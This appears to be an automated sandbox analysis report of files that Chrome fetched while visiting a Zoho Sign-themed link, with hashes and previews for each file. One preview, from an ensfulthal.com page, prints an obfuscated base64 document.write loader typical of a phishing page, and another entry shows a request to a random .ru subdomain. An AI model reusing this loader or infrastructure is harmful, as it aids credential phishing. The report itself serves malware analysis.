                                                      Preview:var verify_recipient;.var allowed_status = ["inprogress", "completed"]; //No I18N.var sign_id = GetURLParameter('sign_id');//No I18N.var is_searchable = GetURLParameter('is_searchable');//No I18N.var is_searchable_param_present = (is_searchable!=null) && (is_searchable!=undefined);.var enc_random_id = GetURLParameter('enc_random_id');//No I18N.var enc_random_id_param_present = (enc_random_id!=null) && (enc_random_id!=undefined);.var inter_dc_session = GetURLParameter('inter_dc_session');//No I18N.var inter_dc_session_present = (inter_dc_session!=null) && (inter_dc_session!=undefined);.var signer_dc = GetURLParameter('signer_dc');//No I18N.var signer_dc_present = (signer_dc!=null) && (signer_dc!=undefined);.var action_id;.var request_id;.var verify_code;.var requestDetails;.var verification_type;.var is_user;.var is_active_user_in_multiple_portals;.var recipient_org_id;.var is_user_logged_in;.var same_user;.var has_account;.var token_auth;.var inter_dc;.var current_user_email;.var respo
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (47691)
                                                      Category:dropped
                                                      Size (bytes):47692
                                                      Entropy (8bit):5.401573598696506
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:B0B3774E70E752266B4CF190E6D95053
                                                      SHA1:03823D33D8C374DD69B66F1D75A5FC93D29967E1
                                                      SHA-256:A9F0787E39291D7BCB873D0D514F1D2C8DB0256FD741C2ABC4D46A809254E141
                                                      SHA-512:8060AA547C3F32930EC2A3786A6BB15054F396D8EAB238EA34E881C2EEAE0D013AF246FDDE85DA8A5BFC2690B1EB26E5138B45BAA28479264DB3BA458D4055A8
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 48976, version 1.6750
                                                      Category:downloaded
                                                      Size (bytes):48976
                                                      Entropy (8bit):7.994669523818989
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:FAD334182A19A73A7A9014D7ECC15659
                                                      SHA1:EADF9CC9C7EE8A0B857949B05B36C5718D6D6825
                                                      SHA-256:2D61272F82E14BB287BFAD271DAD5F839F7480E21DBC42EA026B368424824304
                                                      SHA-512:1A8916385DFC825DE618019FE56735F0C6AD408F3256879C918094050D4E23D26DEC2C4651BB993FBE9E1FD109F738CC93F1DAABEE4948D1B500AB6B578EC4A6
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/texgyrecursorbolditalic/font.woff2
                                                      Preview:wOF2.......P......u........^....................?FFTM..f..N..X.`..f.....H..f.6.$.....t.. .....|[.....n;$!.....s.......H..s...H.%...p.[E..v.........2d..RZ..M....{.R.Y&...j.....v.lr.c2.B3.n....igG.)......u/.."{8...ac_E.< #.C.QrB...Z.K.TJ1.........X.,t.y.....mbZ.d.ff..6.:..B..{...X..{j.R..2"..3.L.e..*;.4L.;.hO....|f..W..l.zuI.O.........H..v"..-.f4.....Vk...?y.k..c.A.)[[.....,)./.... .[. dHI.N{=~..?..;j.....2&H..}........?v.....r;..6'%..v=@k.|...O..........~....$,L@g`.f....Y..S...........@2A.....E...W.W....yz~?.y?..&...C.er....=........yu}...-.o....W4W.j..7....b.%1B...}..fV..A+.Cy??v..b~.....#$......{.a....]<&.c...g=.-R.%R%.hP.x.O$....;.........s.uRR-!,.l8RU.nN......\..*=...J0....h.....l....5.....6i[...c!bQ*..6./......S4...A.L..}.....0.1dm!.)7AL..NH.......]X.D.".._u.%._...`g...x.........?...........=.J...K.......+=.|Uh]X..7Gs`........C.'F.I..g..j....)U^qB......G....3>...].+)@...j...TR..p..x.JT.../..3.._..x.p.|yZ.~...N..D)......P........;.8.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:very short file (no magic)
                                                      Category:downloaded
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://nw2iycgst5mfz3kmc6onhudkkvl7u1mxoob5ixnhoc7c0jiwqzqza.lpliwptf.ru/lkqjkblhpogbqtlvlfgakxvtqbIpGLEFHDRMCVFBBUBEESIFDDALUDBGKVRFUYXASCXSBNVILARORUQAA
                                                      Preview:1
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                      Category:dropped
                                                      Size (bytes):15086
                                                      Entropy (8bit):4.429986132928071
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:0846A82D826C9B9110A4B74674376AFC
                                                      SHA1:DF9A24711A7C3CCACA928C91AD5D40BC7B647D4F
                                                      SHA-256:190A4B361876F870A71D17DE04C0AB682860F8B635B504FC9219C4A0748AB8E1
                                                      SHA-512:C0514121F9534B42791C580EB68B7DD1B58CCAB9436EB4A868D31451EB48CD39A023EC34A06073BC3F2481177FC21F7EA2668F327A64BEACB64429A64ED7CD51
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$.................................................@...................................................................................................................................@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................i..X..W..W..W..W..W..W..W..W..W..W..W..W..W..W..W..W..W..W..W..W..W..W..W..W..X..i.......................................................j.................H..m!..l...l...l...l...l...l...l...l...l...l...l...l...l...l...l...l...l...l...l...l...l...l...l...l...l
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (7437), with CRLF line terminators
                                                      Category:downloaded
                                                      Size (bytes):19636
                                                      Entropy (8bit):5.867267348839669
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:1A116F1FA95E47AC80645CEDCE84AC7D
                                                      SHA1:F354B16CE219B00312F5FDA5CF77833FF350F020
                                                      SHA-256:EF93774BAA8E527A51E6E551C86848807490BBE7C74C83C812EC7C270C7242DB
                                                      SHA-512:2BDD7C7E30BEF639F3EABD5F9CB909A1C08D9E139DB3421334B37B70D5D446FF315D98DE27586FA8D668A5AA4792F63A884F4A4A56B88656242B3D43C6C48746
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://wla3.ensfulthal.com/mw2hN4k/
                                                      Preview: The biggest risk is not taking any risk. -->....<script>....if(atob("aHR0cHM6Ly9CaHMuZW5zZnVsdGhhbC5jb20vbXcyaE40ay8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAg
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (56103)
                                                      Category:downloaded
                                                      Size (bytes):465147
                                                      Entropy (8bit):5.221727247042766
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:169A8E414B24F4A6480E50696C4FFAFF
                                                      SHA1:CD8A882AD7A5D6BE8D654FB10E03317D63434035
                                                      SHA-256:77A575D661B764BFDB0AA0FABF05C1FC2B2A6E72C5645F68AFE6590530B61892
                                                      SHA-512:E00E7A8AA66939F17FFFBC39C44FC0A4071FD9A7B701B4CC927E0495B4AD357C2278F3E08F09EE62A306C6B4D07E65E034C2770FBC362A3B065C73317A553894
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/assets/vendor.169a8e414b24f4a6480e50696c4ffaff.css
                                                      Preview:@charset "UTF-8";/*!. * animate.css -http://daneden.me/animate. * Version - 3.5.1. * Licensed under the MIT license - http://opensource.org/licenses/MIT. *. * Copyright (c) 2016 Daniel Eden. */.animated,.zeffects--rotate{-webkit-animation-duration:1s}a,pre code,table{background-color:transparent}.badge,.label,b,dt,kbd kbd,label,optgroup,strong{font-weight:700}.label,audio,canvas,progress,sub,sup,video{vertical-align:baseline}.cr-slider,button.close,input[type=search]{-webkit-appearance:none}.cropper-container,html{-webkit-tap-highlight-color:transparent}.animated{animation-duration:1s;-webkit-animation-fill-mode:both;animation-fill-mode:both}.animated.infinite{-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite}.animated.hinge{-webkit-animation-duration:2s;animation-duration:2s}.animated.bounceIn,.animated.bounceOut,.animated.flipOutX,.animated.flipOutY{-webkit-animation-duration:.75s;animation-duration:.75s}@-webkit-keyframes bounce{20%,53%,80%,from,to{-webki
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:downloaded
                                                      Size (bytes):117
                                                      Entropy (8bit):4.786517909306625
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:B6B625F667C4AC2FB68E01001D97C3DF
                                                      SHA1:CAF34CCFC1FC969C2C51A2324D37D573C8A01BAC
                                                      SHA-256:FAE83EED3B1E2A16313358EF3C8D410E64212F5BAA08228B4B57F34AD9489ECF
                                                      SHA-512:969A2EAB90C8FC355212FBB798CDFE8AEBF784DD80529A38E2B61CCCD428600D4A11E8630EBF4784C2BB1E719F18ACB6901E4845BB5DB9DAEA8C57F9B889CED3
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://sign.zoho.eu/manifest
                                                      Preview:{.. "related_applications": [{.. "platform": "windows",.. "id": "ZohoCorp.ZohoSign_hfrrf6a1akhx2!App".. }]..}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 30024, version 1.6816
                                                      Category:downloaded
                                                      Size (bytes):30024
                                                      Entropy (8bit):7.993710901240846
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:16BD2DB37ACEBE735E0E21B921FBBD02
                                                      SHA1:68CF71B89B1E7EC695042C2EE8C643F93BFDF275
                                                      SHA-256:78D797CC3D9BC44FC3750320E5821AC5AB3A84D593D254F01F566B210B7142CF
                                                      SHA-512:1168B1F6640367BE425F7E08187C8F20E14DA048A82F72F290F6A376858A6EE30A9D7E18D5E76868A94C0CB68BBDA3965BC45521641BC13C87CF0BD21FC09BCD
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/latoregular/font.woff2
                                                      Preview:wOF2......uH......0 ..t.........................?FFTM..*..v..j.`.......e.....`..9.6.$..@..... ..#....K[..q.m...Aw..4........[%....b..v.".@a......%c..r.ha.Y..f*C....6q.].T.t'..sW.......1\j..n.3_.....Di.hZz..].D.MC.....`..}.wb.x....o...........L..#U.:...G..>./.17.x..........Ba.....s.s..[.#7.'........Gr...c"...@>0.1....`D..f...A..[.....Ieu.T..Gv1....9....p.-.?...}..AJ2..4pJ.S.....?.W.`...f#..`.. ..E.H.."`.*&3..9].p3..4..b.\.k..W/&....Y....b.Q !*'..[.;.4?}./...}.sU...{...x....u/.......y0....5...2...........H3.G.+........z.._.3..Y?#.@.l.@1.`..9`...~}mu.rX.&.*p......k.$..N..;....t0eQJ...h......d`EFN).i.0...f0....9...@..C...M..V_.>!2.x.... T,G.....'*...&.M]...,!..N..{...=.....Egg....W;..pB...8...:h}..UJJ8l.<.M.....M:.._....u*L..bG..K.v[._au....F..#....u.E.{..H#[.....H..L.i.2...Ct.)[..|.=y..{......az........I.._..=...z9{.......h..$.$.~..7U.v..(.G...m..LqC.]......0.q.I}..e&Y.H.$e..4. H.[.1..JN..=.......S...}H....j.\...~.{.;....2..8...!.K.........U..#W"9..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):112
                                                      Entropy (8bit):4.792129251603444
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:0BEBE8D2383E83832C4821E5F4FE92C8
                                                      SHA1:C6EA46EAD4EC322AABAF974784FECD7075CBE1E6
                                                      SHA-256:9993BE4737331DC0D42C6EFC3E1564D0ADCF8CA0D6860273D5644C50EFD0EE74
                                                      SHA-512:332D0F31E9D71B9DD471BD295607AEC0DDD0B86E22699EA1BB80FE8B0098135A6A876F1AC1C6EA39D601605E4E46743493F70C340DBF3F999D5CA91E7B7D4EAA
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSSAkA_V3DAp73qhIFDbLZeJgSBQ1raJpuEgUNT54n-BIFDXedFNISBQ0RidQ3EgUNVZ_5LRIFDZ-tJB8SBQ2U1FseEgUNY67tIQ==?alt=proto
                                                      Preview:ClEKBw2y2XiYGgAKBw1raJpuGgAKBw1Pnif4GgAKBw13nRTSGgAKBw0RidQ3GgAKBw1Vn/ktGgAKBw2frSQfGgAKBw2U1FseGgAKBw1jru0hGgA=
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (955), with CRLF line terminators
                                                      Category:downloaded
                                                      Size (bytes):201253
                                                      Entropy (8bit):2.661810841903416
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:85DE642E1467807F64F7E10807DF3869
                                                      SHA1:C795B490811C0E5A1A8F3C3F620AAB9F00C34F07
                                                      SHA-256:5965B2C5472AACA1CD66EA5B0D07A971B961FEE72FC27EB1F6C760042084B21B
                                                      SHA-512:BF4EC56D6FC54EAAFBD57C4E4D06900D358E39CE15009FB983491B0A83ABB60A0A54F46BE86387AB837B4AE1D1F3FF99156D04207065B0F65F165B54CFAAF47B
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&sdf=0
                                                      Preview:..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):9959
                                                      Entropy (8bit):7.6157309937929805
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:4F94DC244B3A67E8A98AE2C6AF38FE1F
                                                      SHA1:A82C966317EC806AD8BC58DC33B8480D639AA2EE
                                                      SHA-256:4D3EE5CB1D167C2026EC1F23BBBC209D7133BBA9BD10BE0A4DB588E8A385D63C
                                                      SHA-512:F41575984C2AB32FFC8D5DAD7FA8C2BC1DDFEB216A08DF4BD60470254D19AFBE643D5CB292AED4868ED5CA3723F795846E3625BCA8B8CD1AEF7F42DE9FA1FD40
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:.PNG........IHDR..............x......tEXtSoftware.Adobe ImageReadyq.e<..&.IDATx...Ol]...KI..'.2...M.bPd.....Em.]."...b..U.....].P*.U+....i.......(.]...d.L..t0@..d.f....q#...I..4#....=......Tb[.....{....:..[....?...3....>..|...=M2=3.`b.~...x..>..{.......N.s..]."......c!..9......F..@ .tQ............6..h..`.=.UE...0.id@.8n._I.....P.Q..........X..Z....>@.F...>..@.xR..Y-..KQ.7...`\..._Q.......!`S..f.....~......6....a...T..\....S......@[..R.7...~{).l..z......*..qz..\?...k....T.S=/.q..]...#..q7..#......_q..p.q....PG...7.G..0..M.....U.H..v.....0)..`.O!.7.@..@..X.P..................!``.@..@.8..........|.EU.2....+.C~..o%..T7....w.5.@A..v'...@[....../.e.u.....[...m.....@.f..F....i..?.J5_.z.*.........@.b*`...y.....b.~...3..P...Gx.p'.Y........).+..b!.T.wjZ....{........c.._c.......".i.....(..>.DkA....@..J...\I.....=.Q...TD.s.......?U0.j....'.xso...G._....2*p.. .\j......R.....oT`9u.#..:5..l..@?z../.....@.....(. ..{..6/(..E..\O=...d....n...C....3..F.b.]. .v
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 258 x 271, 8-bit/color RGBA, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):4874
                                                      Entropy (8bit):7.842575768924331
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:31D2A0F12D1F71D4A79EDB96E8491657
                                                      SHA1:64608FD56BEC6B373D008EC4FA5E3E2A17484417
                                                      SHA-256:9E5127F82FE211A30F1B0012083C2B281DE1C62CCB5B2018683EF666D66987D2
                                                      SHA-512:9CC8E304362A738B70EB41532F0A0695C162FB4B3BB5D7251AD9CF12C961E040C1BDC37991BA08A38C11CC14FAABE9C6F72507027BD9778272BD2DDC96877804
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/images/Signpass-QR-code.31d2a0f12d1f71d4a79edb96e8491657.png
                                                      Preview:.PNG........IHDR....................pHYs...%...%.IR$.....IDATx...{.\e}....n.@ .@H.QR...b.~....C..[,..."..H.[."...ZQ.E....A..R."7-V...%. .%..!....a.93.Ivgvv>..k_.9..9.\..y..<g.[...4..v...v.6....4z...[.,.....n..........y....`..SR.......(dm.........b.H.n.Q.. .v.. ..x..9d...3...[zEw.._.7..S..7....XH.E$./k.S..Y........;.O....&..6....v|#p....^f.s.@HZ.|.x....]..T.@..M$.! ..yD..M.@.8..wA...A............l....D.'.t.]r..T^....LS.'..~Fe..l.'F..!.....Ij..:^6..-.......f.JRS.H......;..^..Hj..R.w......nRa$.F..o..&....9e..".:.v....1(.l.:>..MG.:.A . .d.H. ..A ..@...$..I...0.$a.H. ..A ..@...$..I...0.$a.H. ..A ..@...$..I...0.$a.H. ..A ..@...$..I...0.$a.H. ..A ..@...$..I...0.$a.H. ..A ..@...$..I...0.$a.H. ..A ..@...$..I...0.$a.H. ..A ..@...$..I...0.$a.H. ..A ..@...$..I...0.$a.H. ..A ..@...$..I...0.$a.H. ..A ..@...$..I.....V.@.l.p(.'..`"0f....x.....\.<?.....-.}.bzYKJ..5.8.8..jqY.D......,...zo.=..<..B.C..{t..x._.....|...X....0...8....1...A.....-..!.61..P.4........e...h`...q&..n..[]...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):61
                                                      Entropy (8bit):3.990210155325004
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 51308, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):51308
                                                      Entropy (8bit):7.995898644379504
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:226E89A3228AEDDBECDA25A22A263D2E
                                                      SHA1:770274880C68B1A169F046D2D918D7CB111D21E4
                                                      SHA-256:B833AC79E5922D43C007F51638C5F4C1F58EEB4E70878C739D477AFD4E7A4FDB
                                                      SHA-512:B9FBF353297A46AF35058A1256C81A0AA2F8D6AF4773096DFACA4E1222CC788FC48EC6690D5C262E339181C86800E70428630CB373D9DE933ED57D38EF09F03A
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/heuristicabold/font.woff2
                                                      Preview:wOF2.......l......s.............................?FFTM...N...*..$.`........L..%.6.$..v.. .. ..3...[......s.T+. .c........0...$.......Wm......L....0......._.T..4........y..:#7.....h.6.GMm.1.._Q.!.4..M....foE....At.........u.O.Nu&....b.Xv*Q).....9IW....rZ.`J...}..M#z.&....Y.bw.Lc=.Y.}.....l..cU..Il.p"....fY....8.v..4..a...X.m..YVb.NN.o.f.......9.........E..u..f....?_..'Hx.:d.:..9K....1a..K+.I.1.d....y.q......n....k..}..)...j..m..v$.gp..pR..}..:.3.P.+<.c..F...s.'...)...*......M?H.R.A....y.p.{tx.b...;|7p..b..s....0.].....t]...u....U.>.....*...\.. .....5.>..P......p..w....f. T2..D..u..o.x..O\...'....1Q.c".W8.G..4#@.3.....f...9ViK+.Y.J....2..<....Q.....(.V......Eb..jd..m4h.T....{..@.....7..&.Y.P!dB./......2....."..%..q.W..6..F.a.....L7...b._...l...9.!..+.L..0........'...y.3.'.lI))A...+gE.[..t....67..M.FS....>.L.C8.!.......!5R..H.>...(..-....di..\K.Me.6....&..x......\.,.%a...9.w....&L...8C~......8.....R.*I#..H.uPZ@V.e[.._Ns8...'.......Uj.......
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:TrueType Font data, digitally signed, 17 tables, 1st "DSIG", 16 names, Macintosh, type 1 string, Pretty-PenRegular1.000;UKWN;Pretty-Pen-RegularPretty-PenVersion 1.000Pretty-Pen-RegularVlad Cris
                                                      Category:downloaded
                                                      Size (bytes):71676
                                                      Entropy (8bit):6.117810531821285
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9120A26D7E3EC6BFAB356B5B7D1851DF
                                                      SHA1:FE74CA5EAB69831F54D5FB8B9B91530AB30AE1E2
                                                      SHA-256:0F9A80D4C814E737D4CBD963901193E13DB778B270BF30284AE1CA9251EC5609
                                                      SHA-512:19CD057C97D7924328AA7AF357FEC8C2E5C01AD3481BFA8FB6CB3EB850340C06BA6FF521069F1CBEFCFD5201C12F5168E969B116EC2ACC3FE729D52EF902DA34
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/fonts/fonts/Pretty-Pen-Regular.9120a26d7e3ec6bfab356b5b7d1851df.ttf
                                                      Preview:............DSIG............GDEF...........(GSUB...0...D... OS/2gN.....d...`cmap...........Zcvt ...........<fpgmvd}v...L....gasp............glyf....... ....head.E.e...<...6hhea.F.....t...$hmtx............loca[......,...Lmaxp.c.....x... name.Q7%.......\post..V.........prep.P.....d...................................................$.V..DFLT......................aalt..liga. salt.&ss01.,.................................".......................v.......x......... .*.4.>.H.R.\.........~.........................................................................2.........(.....................~...................................X...K...X...^.2.f............................UKWN.@. .......................+... .......................................................................................................................................................................!.".).*.,.1.2.8.B.D.E.I.M.Q.Z.[.`.a.f.............j.u.v.z.~.............................................................7.;.T.k
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):800453
                                                      Entropy (8bit):5.124585556710362
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5908C391A51CFB118CFF8004A60280B9
                                                      SHA1:465528932E246587FEFAA471081B0806348F7E02
                                                      SHA-256:C93FE96036F9DDEC6582E52D80D520D1A1384502DEA25A44957CA5A7BB0ECF72
                                                      SHA-512:BBB5C76AAE1FD84AC55A2576433F2F298FC262D9121C65ECCD3C26F9644EE871053ACBC9EE0D4767CF3E2266E9F4D00EC11EDE21B0C7D12E0BBEBF1426E2CD83
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:/**. * @licstart The following is the entire license notice for the. * JavaScript code in this page. *. * Copyright 2023 Mozilla Foundation. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. *. * @licend The above is the entire license notice for the. * JavaScript code in this page. */../******/ var __webpack_modules__ = ({../***/ 9306:./***/ ((module, __unused_webpack_exports, __webpack_require__) => {...var isCallable = __webpack_require__(4901);.var tryToString = __webpack_require__(6
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:downloaded
                                                      Size (bytes):1122
                                                      Entropy (8bit):5.112021943406707
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:07BB8D27292E00C83D5DA3459A0F5930
                                                      SHA1:4A1E2D7E6EFBA8B68AE8BFE6685FC5B76F596450
                                                      SHA-256:B6BC20E6DA2F1E1C7EE35E04C431F402E020C959A73A28870FCE0EC3F9A6466D
                                                      SHA-512:4B5DCD6BC16C168B1350EB136766BE7C21BE9698E884CF2B919FFDB4B6334FCB6FABDD057DE51A4A37E399150A6E8D015D850AF9092C75F0D48A37E816CD118D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/fonts/font-styles-2.07bb8d27292e00c83d5da3459a0f5930.css
                                                      Preview:@charset "UTF-8";..@font-face {. font-family: "zs-font-2";. src:url("fonts/zs-font-2.4ae7ea81deb1b3765fb90f1ddd378f4c.eot");. src:url("fonts/zs-font-2.4ae7ea81deb1b3765fb90f1ddd378f4c.eot?#iefix") format("embedded-opentype"),. url("fonts/zs-font-2.fcb3da1f66baa3953e471d080783915e.woff") format("woff"),. url("fonts/zs-font-2.ttf") format("truetype"),. url("fonts/zs-font-2.1b22acce884d9ee011bc42f82f9ffd07.svg#zs-font-2") format("svg");. font-weight: normal;. font-style: normal;..}..[class^="icon-2-"]:before,.[class*=" icon-2-"]:before {. font-family: "zs-font-2" !important;. font-style: normal !important;. font-weight: normal !important;. font-variant: normal !important;. text-transform: none !important;. speak: none;. line-height: 1;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}...icon-2-attach:before {. content: "\e000";.}..icon-2-gift:before {. content: "\e001";.}..icon-2-webinar:before {. content: "\e002";.}..icon-2-desktop:bef
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (5506)
                                                      Category:downloaded
                                                      Size (bytes):5507
                                                      Entropy (8bit):5.283923241752364
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:BC05AB6DA09B6CFEDB61D605AAFC2443
                                                      SHA1:B742C236BC864C2437A6EDB474887852D9BEB334
